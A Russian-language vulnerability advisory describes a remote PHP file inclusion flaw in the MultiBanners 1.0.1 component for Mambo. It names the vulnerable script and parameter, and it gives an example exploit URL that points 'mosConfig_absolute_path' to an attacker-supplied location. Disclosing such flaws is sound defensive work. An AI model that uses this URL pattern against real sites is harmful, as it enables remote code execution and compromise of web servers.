PHP-инклюдинг в Mambo MultiBanners

Дата публикации:
25.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
3152
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MultiBanners 1.x (компонент к Mambo)
Уязвимые версии: MultiBanners (компонент Mambo) 1.0.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_multibanners/extadminmenus.class.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://site.com/[path]//administrator/components/com_multibanners
/extadminmenus.class.php?mosConfig_absolute_path=[attacker]

URL производителя: mamboxchange.com/projects/multibanners/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

или введите имя

CAPTCHA